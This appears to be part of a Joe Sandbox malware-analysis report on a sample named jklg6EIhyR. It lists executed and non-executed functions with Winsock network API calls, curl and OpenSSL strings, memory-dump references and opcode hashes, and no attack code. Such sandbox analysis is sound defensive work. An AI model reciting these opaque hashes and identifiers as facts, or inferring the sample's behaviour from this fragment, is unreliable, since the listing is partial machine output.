                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: gethostname
                                                    • String ID:
                                                    • API String ID: 144339138-0
                                                    • Opcode ID: ee45bce59f8afdd1bb21df0a476c44e34d5842bf72f553f8b125bdda1d2667f9
                                                    • Instruction ID: 4088df8bbf1f9306c506647a546ea1ad62f340e298b2ac5a1d3fce4a09eef4e6
                                                    • Opcode Fuzzy Hash: ee45bce59f8afdd1bb21df0a476c44e34d5842bf72f553f8b125bdda1d2667f9
                                                    • Instruction Fuzzy Hash: 9451E1706047208BE7309B65ED497237AD4FF01729F54283DE98ACA6E1E775E8C4C722
                                                    Function 0083AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • getsockname.WS2_32(?,?,00000080), ref: 0083AFD0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: getsockname
                                                    • String ID:
                                                    • API String ID: 3358416759-0
                                                    • Opcode ID: 2e6e9b34fbeec65a63e7df86a9891d55ef7b71dc4e8e2032bb50ba5e4aa2e6d1
                                                    • Instruction ID: 649f9b78d67b527dc7498c679c6c920bece624a2b58fc9126c102d29f69cb905
                                                    • Opcode Fuzzy Hash: 2e6e9b34fbeec65a63e7df86a9891d55ef7b71dc4e8e2032bb50ba5e4aa2e6d1
                                                    • Instruction Fuzzy Hash: DF119670808B8595EB2A8F18D402BE6B3F4FFD0328F109A18E5D942150FB325AC58BC2
                                                    Function 0083A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0083A97E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: send
                                                    • String ID:
                                                    • API String ID: 2809346765-0
                                                    • Opcode ID: d4ada46795e29a87f5fbb48be1d1d0bbfdcc43c9c89ece78af8ca2f57152dbed
                                                    • Instruction ID: 5bc779ae46e7e4f54998eb80eded049ad1087c88ca3999b097edc06ff53eb9e9
                                                    • Opcode Fuzzy Hash: d4ada46795e29a87f5fbb48be1d1d0bbfdcc43c9c89ece78af8ca2f57152dbed
                                                    • Instruction Fuzzy Hash: 5901A272B01710AFC6148F24DC45B5AFBA9FFC4720F068659EA986B361C331AC118BD1
                                                    Function 0083AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • socket.WS2_32(?,0083B280,00000000,-00000001,00000000,0083B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0083AF67
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: socket
                                                    • String ID:
                                                    • API String ID: 98920635-0
                                                    • Opcode ID: 35070f1b1e0794f6e91dd8874acbab1258b4af4038c717696b61b56a92fc537c
                                                    • Instruction ID: 7e03a9db2e346c7c45b447e49bf956be803fb9c1905de53933a016dfb596389b
                                                    • Opcode Fuzzy Hash: 35070f1b1e0794f6e91dd8874acbab1258b4af4038c717696b61b56a92fc537c
                                                    • Instruction Fuzzy Hash: 0CE0EDB6A092216BD654DB18E844AABF36DEFC4B20F055A49B89467214C730AC508BE2
                                                    Function 0083B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • closesocket.WS2_32(?,00839422,?,?,?,?,?,?,?,?,?,?,?,00823377,00C08640,00000000), ref: 0083B04D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: closesocket
                                                    • String ID:
                                                    • API String ID: 2781271927-0
                                                    • Opcode ID: a9fc4c24bcf5d8b75f91b9f805bd7b265a6447674bd6187fc016e3a3c882ea2a
                                                    • Instruction ID: 0e5365a978aba1b9529fdeb44cb07cd92497401de2a9fd605951a3321f9704dc
                                                    • Opcode Fuzzy Hash: a9fc4c24bcf5d8b75f91b9f805bd7b265a6447674bd6187fc016e3a3c882ea2a
                                                    • Instruction Fuzzy Hash: 62D0C27470460157CA288A14C894A57762BBFD0720FA8CF6CE12C8A154CB3BCC438A81
                                                    Function 007D67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ioctlsocket.WS2_32(?,8004667E,?,?,007AAF56,?,00000001), ref: 007D67FC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: ioctlsocket
                                                    • String ID:
                                                    • API String ID: 3577187118-0
                                                    • Opcode ID: c7122a06170a26ae89b9efe87d17e55abbb909d88b7b46e08d40b33f4e9b2539
                                                    • Instruction ID: 2c403e2d6a0cdf6dc2de0a1d303b2a4452d207a0fd9d52673b7443b6c3eaab71
                                                    • Opcode Fuzzy Hash: c7122a06170a26ae89b9efe87d17e55abbb909d88b7b46e08d40b33f4e9b2539
                                                    • Instruction Fuzzy Hash: 44C012F1218101AFC6088714D455B2F76D9DB44355F01581CB04691180EA305990CB16
                                                    Function 007731D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: fb2f196ed12c1871ec045e4da30f91bca636c8d49ff5bb4832064e7d09411a96
                                                    • Instruction ID: 138044f480c4fd231269cf0959f771e68569a4b41de680a12cf8e30284f940bf
                                                    • Opcode Fuzzy Hash: fb2f196ed12c1871ec045e4da30f91bca636c8d49ff5bb4832064e7d09411a96
                                                    • Instruction Fuzzy Hash: 3C3197B49053099FCB00EFB8D5856AEBBF1BF44344F008969E9A8A7351E734DA48DF52

                                                    Non-executed Functions

                                                    Function 00784940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                    • API String ID: 0-122532811
                                                    • Opcode ID: 731248e33cf70ef8005214d72cdd39722a08e71c1c4f666920895a86caa7dfff
                                                    • Instruction ID: 1a805f17eb6676be6c23f4e3dae0a911ea0612489e6210b0c0b3572494b71540
                                                    • Opcode Fuzzy Hash: 731248e33cf70ef8005214d72cdd39722a08e71c1c4f666920895a86caa7dfff
                                                    • Instruction Fuzzy Hash: C342F871B08705AFD718DE28CC45B6BB7EAEBC8704F04892CF54D97291D779AC148B92
                                                    Function 00829880 Relevance: 15.2, Strings: 12, Instructions: 226COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                                    • API String ID: 0-1574211403
                                                    • Opcode ID: 1c262e33fe9cdeb002c24049d1f8f60c6f307c1276813b18aed13bebd3e59d18
                                                    • Instruction ID: dbe78a148e612989b58f6d172910b68e27533e383f0059d97b189bb432b051d7
                                                    • Opcode Fuzzy Hash: 1c262e33fe9cdeb002c24049d1f8f60c6f307c1276813b18aed13bebd3e59d18
                                                    • Instruction Fuzzy Hash: 1661E8A5A0832467E714A628BC52B3B76D9FBD5314F04843DFCCAD6382FA71D9948293
                                                    Function 00794F70 Relevance: 12.2, Strings: 9, Instructions: 911COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                    • API String ID: 0-1914377741
                                                    • Opcode ID: 8046999a6ea2c54798108d1c207185136bbcf82e2ff49dfecb64c47cea658f95
                                                    • Instruction ID: 00096978e33a6c3e7a607f4dedfe60437d312ecda44630caa8e20dce247784fc
                                                    • Opcode Fuzzy Hash: 8046999a6ea2c54798108d1c207185136bbcf82e2ff49dfecb64c47cea658f95
                                                    • Instruction Fuzzy Hash: F5725970608B519FEF238A28E4467A6B7D29F91344F08862CED855B393E77EDD84C391
                                                    Function 00930D80 Relevance: 9.5, Strings: 7, Instructions: 705COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                                    • API String ID: 0-2550110336
                                                    • Opcode ID: e5c9a61349646eaf48d287c59204d66f6aa92e8cc054288cefd25237d88bcc30
                                                    • Instruction ID: 6f0a7d53cfd9fb6a3a97e99a0065f71ed3ace3f9ceeed4c0759b62eed1638699
                                                    • Opcode Fuzzy Hash: e5c9a61349646eaf48d287c59204d66f6aa92e8cc054288cefd25237d88bcc30
                                                    • Instruction Fuzzy Hash: 67325734B48310EFD724AAA09C43F7B7799AF80B08F184928F945662D7E7B4E8548F52
                                                    Function 0083EF90 Relevance: 9.4, Strings: 7, Instructions: 688COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1430444255.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000000.00000002.1430429452.0000000000770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430444255.0000000000E97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430898281.0000000000E9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000000E9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1430912657.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431194841.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1431306823.00000000013F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_770000_jklg6EIhyR.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $.$;$?$?$xn--$xn--
                                                    • API String ID: 0-543057197
